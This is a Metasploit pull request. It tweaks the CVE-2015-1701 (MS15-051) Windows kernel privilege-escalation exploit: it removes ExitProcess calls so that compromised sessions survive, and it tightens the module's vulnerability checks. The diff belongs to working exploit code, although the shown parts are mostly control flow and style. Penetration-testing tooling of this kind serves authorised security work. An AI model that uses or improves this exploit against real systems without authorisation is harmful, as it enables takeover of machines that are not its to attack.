### PR TITLE
Minor CVE-2015-1701 Changes

### DIFF
--- a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
@@ -424,12 +424,10 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	RtlGetVersion(&osver);
 	
 	if (osver.dwBuildNumber > 7601) {
-		ExitProcess((UINT)-1);
 		return;
 	}
 
 	if (supIsProcess32bit(GetCurrentProcess())) {
-		ExitProcess((UINT)-2);
 		return;
 	}
 
@@ -444,7 +442,6 @@ void win32k_client_copy_image(LPVOID lpPayload)
 
 
 	if (g_PsLookupProcessByProcessIdPtr == NULL) {
-		ExitProcess((UINT)-3);
 		return;
 	}
 
@@ -496,7 +493,7 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	if (class_atom)
 		UnregisterClass(MAKEINTATOM(class_atom), hinst);
 
-	ExitProcess(0);
+	return;
 }
 
 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)

--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -57,19 +57,17 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo["OS"]
-
-    if os !~ /windows/i
+    if sysinfo['OS'] !~ /windows/i
       return Exploit::CheckCode::Unknown
     end
 
-    if sysinfo["Architecture"] =~ /(wow|x)64/i
+    if sysinfo['Architecture'] =~ /(wow|x)64/i
       arch = ARCH_X86_64
-    elsif sysinfo["Architecture"] =~ /x86/i
+    elsif sysinfo['Architecture'] =~ /x86/i
       arch = ARCH_X86
     end
 
-    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 
@@ -83,15 +81,15 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
+    if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
     end
 
-    if sysinfo["Architecture"] =~ /wow64/i
+    if sysinfo['Architecture'] =~ /wow64/i
       fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
-    elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
+    elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
       fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
-    elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
+    elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
       fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
     end
 


### PR DESCRIPTION
This PR makes some minor changes to the CVE-2015-1701 exploit. This is long over due since I mentioned I'd try to put a PR together, sorry about that.

Primary changes include:
 * Discontinuing exploitation when the check code is ```Exploit::CheckCode::Unknown```
 * Not calling ExitProcess to avoid killing sessions when the exploit DLL is loaded into the session process